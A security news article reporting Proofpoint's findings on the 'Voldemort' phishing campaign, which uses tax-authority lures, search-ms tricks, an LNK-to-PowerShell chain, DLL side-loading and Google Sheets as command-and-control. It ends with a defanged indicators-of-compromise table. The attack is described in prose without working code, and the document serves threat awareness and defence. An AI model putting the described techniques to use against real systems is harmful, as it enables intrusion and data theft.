Proofpoint researchers have uncovered a cyberattack campaign, “Voldemort,” using Google Sheets as a C2 platform. Targeting Windows users, the campaign employs a unique attack chain with both common and rare techniques to deliver custom malware, highlighting significant cybersecurity challenges.
Voldemort Campaign
Proofpoint researchers discovered a unique attack campaign using Google Sheets for C2 operations. The custom backdoor malware, dubbed “Voldemort,” is written in C and can gather information and deploy additional payloads. The campaign employs sophisticated techniques, making it stand out in the threat landscape.
The campaign, starting on August 5, 2024, sent over 20,000 malicious emails to more than 70 organizations globally.
Threat actors impersonated tax authorities from countries like the U.S., UK, France, and others, using compromised domains to make the phishing attempts appear more authentic.
The emails included links to a landing page on InfinityFree. Clicking “View Document” checked for a Windows environment, then redirected users to a TryCloudflare-tunneled link, which opened Windows Explorer. This trick made the malware appear as a local PDF file, encouraging user interaction.
The Voldemort campaign uses the Windows search protocol (search-ms) to make remote files appear local. This method, often used for deploying RATs, is gaining popularity among cybercriminals and includes saved search file formats (.search-ms) to further hide malicious actions.
Execution and Payload Delivery
If the victim runs the malicious LNK file, it executes a PowerShell command to run Python.exe from a WebDAV share, executing a script that collects system information and sends it to the attacker.
The malware also downloads a fake PDF and a password-protected ZIP file, extracting and running a legitimate executable that is vulnerable to DLL hijacking.
The Use of Google Sheets for Command and Control
Instead of relying on traditional or compromised servers, the Voldemort malware uses Google Sheets for command and control (C2), data exfiltration, and executing commands. By using a client token for authentication, the malware reads and writes data on Google Sheets, making it a communication channel with the attackers. It supports various commands for file and system operations, and reports back with status updates, including the malware’s name, “Voldemort.”
Implications and Risks
Proofpoint believes with moderate confidence that the Voldemort campaign is driven by an advanced persistent threat (APT) actor focused on intelligence gathering. However, its scale and targeting suggest a mix of espionage and cybercriminal activities.
Using cloud services like Google Sheets for malicious purposes reflects a troubling trend. It enables attackers to exploit legitimate infrastructure, complicating detection and response efforts for cybersecurity professionals.
The Voldemort campaign shows an advanced use of cloud services in cyberattacks. As threats evolve, cybersecurity professionals must enhance defenses and stay aware of how legitimate tools can be misused.
Indicators of compromise
| Indicator | Description | First Observed |
| hxxps://pubs[.]infinityfreeapp[.]com/SA150_Notes_2024[.]html | Redirect Target / Landing Page | 2024-08-12 |
| hxxps://pubs[.]infinityfreeapp[.]com/IRS_P966[.]html | Redirect Target / Landing Page | 2024-08-06 |
| hxxps://pubs[.]infinityfreeapp[.]com/Notice_pour_remplir_la_N%C2%B0_2044[.]html | Redirect Target / Landing Page | 2024-08-13 |
| hxxps://pubs[.]infinityfreeapp[.]com/La_dichiarazione_precompilata_2024[.]html | Redirect Target / Landing Page | 2024-08-05 |
| hxxps://pubs[.]infinityfreeapp[.]com/Steuerratgeber[.]html | Redirect Target / Landing Page | 2024-08-13 |
| hxxps://od[.]lk/s/OTRfNzQ5NjQwOTJf/test[.]png | Python Payload (Renamed ZIP containing Voldemort) | 2024-08-05 |
| hxxps://od[.]lk/s/OTRfODQ1Njk2ODVf/2044_4765[.]pdf | Python Payload (Decoy PDFs) | 2024-08-05 |
| hxxps://od[.]lk/s/OTRfODM5Mzc3NjFf/irs-p966[.]pdf | Python Payload (Decoy PDFs) | 2024-08-06 |
| hxxps://od[.]lk/s/OTRfODM3MjM2NzVf/La_dichiarazione_precompilata_2024[.]pdf | Python Payload (Decoy PDFs) | 2024-08-05 |
| hxxps://od[.]lk/s/OTRfODQ1NDc2MjZf/SA150_Notes_2024[.]pdf | Python Payload (Decoy PDFs) | 2024-08-12 |
| hxxps://od[.]lk/s/OTRfODQ1NzA0Mjlf/einzelfragen_steuerbescheinigungen_de[.]pdf | Python Payload (Decoy PDFs) | 2024-08-13 |
| hxxp://83[.]147[.]243[.]18/p/ | pingb.in base URL | 2024-08-05 |
| 3fce52d29d40daf60e582b8054e5a6227a55370bed83c662a8ff2857b55f4cea | test.png/zip SHA256 | 2024-08-05 |
| 561e15a46f474255fda693afd644c8674912df495bada726dbe7565eae2284fb | CiscoSparkLauncher.dll SHA256 (Voldemort Malware) | 2024-08-05 |
| 6bdd51dfa47d1a960459019a960950d3415f0f276a740017301735b858019728 | CiscoCollabHost.exe SHA256 (Benign file used for side-loading) | 2024-08-05 |
| pants-graphs-optics-worse[.]trycloudflare[.]com | TryCloudflare Tunnel Hostname | 2024-08-05 |
| ways-sms-pmc-shareholders[.]trycloudflare[.]com | TryCloudflare Tunnel Hostname | 2024-08-05 |
| recall-addressed-who-collector[.]trycloudflare[.]com | TryCloudflare Tunnel Hostname | 2024-08-05 |
| hxxps://sheets[.]googleapis[.]com:443/v4/spreadsheets/16JvcER-0TVQDimWV56syk91IMCYXOvZbW4GTnb947eE/ | Voldemort C2 | 2024-08-05 |
| hxxps://resource[.]infinityfreeapp[.]com/ABC_of_Tax[.]html | Redirect Target / Landing Page | 2024-08-19 |
| hxxps://resource[.]infinityfreeapp[.]com/0023012-317[.]html | Redirect Target / Landing Page | 2024-08-19 |
| hxxps://od[.]lk/s/OTRfODQ4ODE4OThf/logo[.]png | Python Payload (Renamed ZIP containing Voldemort) | 2024-08-19 |
| hxxps://od[.]lk/s/OTRfODQ5MzQ5Mzlf/ABC_of_Tax[.]pdf | Python Payload (Decoy PDFs) | 2024-08-19 |
| 0b3235db7e8154dd1b23c3bed96b6126d73d24769af634825d400d3d4fe8ddb9 | logo.png/zip SHA256 | 2024-08-19 |
| fa383eac2bf9ad3ef889e6118a28aa57a8a8e6b5224ecdf78dcffc5225ee4e1f | CiscoSparkLauncher.dll Hash (Voldemort Malware) | 2024-08-19 |
| invasion-prisoners-inns-aging[.]trycloudflare[.]com | TryCloudflare Tunnel Hostname | 2024-08-19 |
Follow Us on: Twitter, Instagram, Facebook to get the latest security news!
Leave A Comment